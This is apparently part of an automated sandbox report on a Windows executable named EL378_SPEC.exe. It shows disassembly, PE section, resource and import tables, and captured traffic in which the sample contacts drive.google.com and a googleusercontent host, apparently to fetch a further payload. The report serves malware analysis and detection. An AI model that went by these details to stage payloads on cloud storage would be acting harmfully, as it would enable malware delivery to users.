call dword ptr [00409170h]
mov esi, dword ptr [004090ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007FE1E85FB6A9h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007FE1E85FB683h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007FE1E85FB67Dh
xor eax, eax
jmp 00007FE1E85FB664h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007FE1E85FB67Dh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007FE1E85FB676h
mov eax, dword ptr [esp+38h]
mov dword ptr [00435AF8h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b0c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5b000	0x281e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x90088	0x2330
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7032	0x7200	False	0.6497395833333334	data	6.41220875237026	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x19a2	0x1a00	False	0.455078125	data	5.04107190530894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x2ab00	0x200	False	0.30078125	data	2.035495984906757	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x25000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5b000	0x281e0	0x28200	False	0.44017718068535827	data	5.180624208298884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5b310	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.391991009109192
RT_ICON	0x6bb38	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.4620821946605003
RT_ICON	0x74fe0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.47583179297597045
RT_ICON	0x7a468	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.4557156353330184
RT_ICON	0x7e690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5067427385892116
RT_ICON	0x80c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5225140712945591
RT_ICON	0x81ce0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5983606557377049
RT_ICON	0x82668	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6462765957446809
RT_DIALOG	0x82ad0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x82bd0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x82cf0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x82db8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x82e18	0x76	data	English	United States	0.7457627118644068
RT_MANIFEST	0x82e90	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5541022592152199

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll	SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll	WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 14, 2023 13:02:42.851408005 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:42.851428032 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:42.851655960 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:42.864115953 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:42.864128113 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:42.906330109 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:42.906583071 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:42.906583071 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:42.906816959 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:42.907280922 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:42.907470942 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.004925966 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.004937887 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:43.005228043 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:43.005382061 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.009079933 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.052114964 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:43.331801891 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:43.332009077 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.332092047 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:43.332212925 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:43.332236052 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.332285881 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.332285881 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.332330942 CEST	443	49933	142.250.186.174	192.168.11.20
Aug 14, 2023 13:02:43.332370043 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.332495928 CEST	49933	443	192.168.11.20	142.250.186.174
Aug 14, 2023 13:02:43.483234882 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.483261108 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.483529091 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.483808041 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.483825922 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.526778936 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.527015924 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.527627945 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.527959108 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.532107115 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.532123089 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.532427073 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.532563925 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.533073902 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.576069117 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.776810884 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.777113914 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.777170897 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.777342081 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.778206110 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.778434992 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.778435946 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.779957056 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.780236959 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.780731916 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.781021118 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.781589985 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.781739950 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.781795979 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.782012939 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.782459974 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.782704115 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.782763004 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.782951117 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.789366007 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.789540052 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.789599895 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.789783955 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.789824963 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.789979935 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.790018082 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.790159941 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.790512085 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.790798903 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.790852070 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.791070938 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.791362047 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.791528940 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.791585922 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.791805983 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.792346001 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.792516947 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.792577982 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.792743921 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.793092012 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.793303013 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.793356895 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.793504000 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.793936968 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.794097900 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.794142008 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.794403076 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.794924974 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.795094013 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.795150042 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.795319080 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.795543909 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.795716047 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.796186924 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.796338081 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.796379089 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.796530008 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.797070026 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.797219992 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.797260046 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.797437906 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.797820091 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.797971964 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.798023939 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.798182011 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.798214912 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.798453093 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.798491001 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.798635960 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.798664093 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.798829079 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.799227953 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.799452066 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.799508095 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.799757004 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.799983978 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.800131083 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.800220013 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.800415993 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.800837994 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.801031113 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.801079988 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.801316977 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.801579952 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.801743031 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.801776886 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.802000999 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.802249908 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.802407026 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.802448988 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.802680016 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.802712917 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.802819014 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.802939892 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.803097010 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.803143978 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.803373098 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.803415060 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.803563118 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.803838968 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.804029942 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.804084063 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.804306984 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.804342985 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.804490089 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.804517984 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.804733038 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.804775953 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.804999113 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.805054903 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.805198908 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.805226088 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.805254936 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.805375099 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.805376053 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.805638075 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.805800915 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.805855036 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.806016922 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.806046009 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.806160927 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.806179047 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.806355953 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.806384087 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.806524992 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.806622982 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.806782961 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.806844950 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.807018995 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.807064056 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.807284117 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.807318926 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.807461977 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.807511091 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.807657003 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.807727098 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.807946920 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.807997942 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.808140993 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.808173895 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.808319092 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.808680058 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.808906078 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.808929920 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.809077978 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.809123039 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.809284925 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.809312105 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.809452057 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.809470892 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.809619904 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.809638023 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.809773922 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.809792995 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.809943914 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.809967995 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.810113907 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.810427904 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.810596943 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.810668945 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.810868025 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.810905933 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.811049938 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.811078072 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.811248064 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.811281919 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.811517954 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.811619043 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.811827898 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.811852932 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.811880112 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.811899900 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.811928988 CEST	443	49934	142.250.185.97	192.168.11.20
Aug 14, 2023 13:02:43.812046051 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.812046051 CEST	49934	443	192.168.11.20	142.250.185.97
Aug 14, 2023 13:02:43.812092066 CEST	49934	443	192.168.11.20	142.250.185.97

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 14, 2023 13:02:42.837853909 CEST	64237	53	192.168.11.20	1.1.1.1
Aug 14, 2023 13:02:42.846874952 CEST	53	64237	1.1.1.1	192.168.11.20
Aug 14, 2023 13:02:43.450592041 CEST	50022	53	192.168.11.20	1.1.1.1
Aug 14, 2023 13:02:43.482206106 CEST	53	50022	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 14, 2023 13:02:42.837853909 CEST	192.168.11.20	1.1.1.1	0x43b4	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Aug 14, 2023 13:02:43.450592041 CEST	192.168.11.20	1.1.1.1	0x19d9	Standard query (0)	doc-0s-as-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 14, 2023 13:02:42.846874952 CEST	1.1.1.1	192.168.11.20	0x43b4	No error (0)	drive.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Aug 14, 2023 13:02:43.482206106 CEST	1.1.1.1	192.168.11.20	0x19d9	No error (0)	doc-0s-as-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 14, 2023 13:02:43.482206106 CEST	1.1.1.1	192.168.11.20	0x19d9	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.97	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-0s-as-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49933	142.250.186.174	443	C:\Users\user\Desktop\EL378_SPEC.exe

Timestamp	kBytes transferred	Direction	Data
